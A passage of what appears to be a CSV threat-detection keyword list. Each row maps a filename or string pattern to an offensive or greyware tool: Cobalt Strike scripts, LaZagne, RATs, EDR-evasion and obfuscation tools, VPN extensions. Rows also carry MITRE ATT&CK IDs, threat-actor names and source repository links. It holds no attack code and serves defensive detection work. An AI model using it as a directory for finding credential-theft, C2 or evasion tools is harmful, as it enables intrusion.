- T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*aggressor.cna*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" +"*aggressor.dialog*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*aggressor.println*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*aggressor.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*Aggressor/TikiTorch*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*AggressorScripts*","offensive_tool_keyword","AggressorScripts-1","Collection of Aggressor scripts for Cobalt Strike 3.0+ pulled from multiple sources","T1074 - T1070 - T1105 - T1558","TA0007 - TA0003 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/Cn33liz/AggressorScripts-1","1","1","N/A","N/A","1","1","1","2018-06-24T16:27:57Z","2019-10-18T12:56:35Z" +"*aggressor-scripts*","offensive_tool_keyword","cobaltstrike","beacon generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/eddiezab/aggressor-scripts/tree/master","1","1","N/A","10","10","1","0","2021-01-29T21:01:58Z","2021-01-29T21:00:26Z" +"*Aggressor-Scripts*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*ahmedkhlief/Ninja*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*ahmedkhlief/Ninja*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*AhMyth-Android-RAT*","offensive_tool_keyword","AhMyth-Android-RAT","AhMyth Android Rat","T1020 - T1071 - T1071.001","TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/AhMyth/AhMyth-Android-RAT","1","0","N/A","N/A","10","3978","1661","2021-08-12T21:23:08Z","2017-07-07T03:03:37Z" +"*ahsten.run \*powershell.exe*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*aigmfoeogfnljhnofglledbhhfegannp*","greyware_tool_keyword","Lethean Proxy VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*Airbash*","offensive_tool_keyword","Airbash","A POSIX-compliant fully automated WPA PSK handshake capture script aimed at penetration testing.","T1565 - T1593 - T1594 - T1567","TA0002 - TA0007 - TA0009 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/tehw0lf/airbash","1","0","N/A","N/A","4","340","64","2021-10-26T09:47:34Z","2018-04-18T23:50:15Z" +"*Aircrack-ng*","offensive_tool_keyword","aircrack-ng","WiFi security auditing tools suite.","T1110 - T1170 - T1180 - T1201 - T1213","TA0001 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","10","4238","838","2023-09-30T22:40:36Z","2018-03-10T17:11:11Z" +"*aircrack-ng*","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","46","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" +"*aireplay-ng *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*aireplay-ng *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Airgeddon*","offensive_tool_keyword","Airgeddon","This is a multi-use bash script for Linux systems to audit wireless networks.","T1590 - T1533 - T1170 - T1583.001","TA0002 - TA0003 - ","N/A","N/A","Network Exploitation tools","https://github.com/v1s1t0r1sh3r3/airgeddon","1","0","N/A","N/A","10","5430","1104","2023-10-02T21:32:56Z","2016-03-18T10:34:56Z" +"*airman604/splunk_whisperer*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" +"*airmon-ng*","offensive_tool_keyword","airmon-ng","This script can be used to enable monitor mode on wireless interfaces. It may also be used to kill network managers or go back from monitor mode to managed mode","T1018 - T1040","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.aircrack-ng.org/doku.php?id=airmon-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*airodump-ng *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*airpwn-ng*","offensive_tool_keyword","airpwn-ng","We force the targets browser to do what we want","T1562 - T1564 - T1565 - T1566 - T1567 - T1573","TA0005 - TA0007 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/ICSec/airpwn-ng","1","1","N/A","N/A","1","23","11","2022-11-07T02:22:34Z","2021-07-20T03:43:13Z" +"*aix2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*aix2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ajpc500/BOFs*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*akeehkgglkmpapdnanoochpfmeghfdln*","greyware_tool_keyword","VPN Master","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*akkbkhnikoeojlhiiomohpdnkhbkhieh*","greyware_tool_keyword","Prime VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*AlanFramework.git*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*Alcatraz.sln*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" +"*Alcatraz.vcxproj*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" +"*Alcatraz/obfuscator*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" +"*Alcatraz-master.zip*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" +"*AlessandroZ/BeRoot*","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1548 - T1574","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" +"*AlessandroZ/BeRoot*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" +"*AlessandroZ/LaZagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*alexa-top-20000-sites.txt*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*al-khaser*","offensive_tool_keyword","al-khaser","al-khaser is a PoC malware application with good intentions that aims to stress your anti-malware system. It performs a bunch of common malware tricks with the goal of seeing if you stay under the radar","T1055 - T1117 - T1218 - T1003 - T1552","TA0002 - TA0008 - TA0006","N/A","N/A","Exploitation tools","https://github.com/LordNoteworthy/al-khaser","1","0","N/A","N/A","10","5073","1120","2023-09-29T17:54:38Z","2015-11-12T18:35:16Z" +"*All EDR drivers were successfully removed from Kernel callbacks!*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*All_SubdomainTOP_Seclist.txt*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1720","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" +"*AllowDelegationUsers.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*AllowDelegationUsers_samaccountnames_only.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*almalgbpmcfpdaopimbdchdliminoign*","greyware_tool_keyword","Urban Shield","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*almandin/krbjack*","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","1","N/A","10","1","73","13","2023-05-21T15:00:07Z","2023-04-16T10:44:55Z" +"*ALPC-TaskSched-LPE*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ALPC-TaskSched-LPE.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Alphabug_CS*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*Alphabug_CS*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 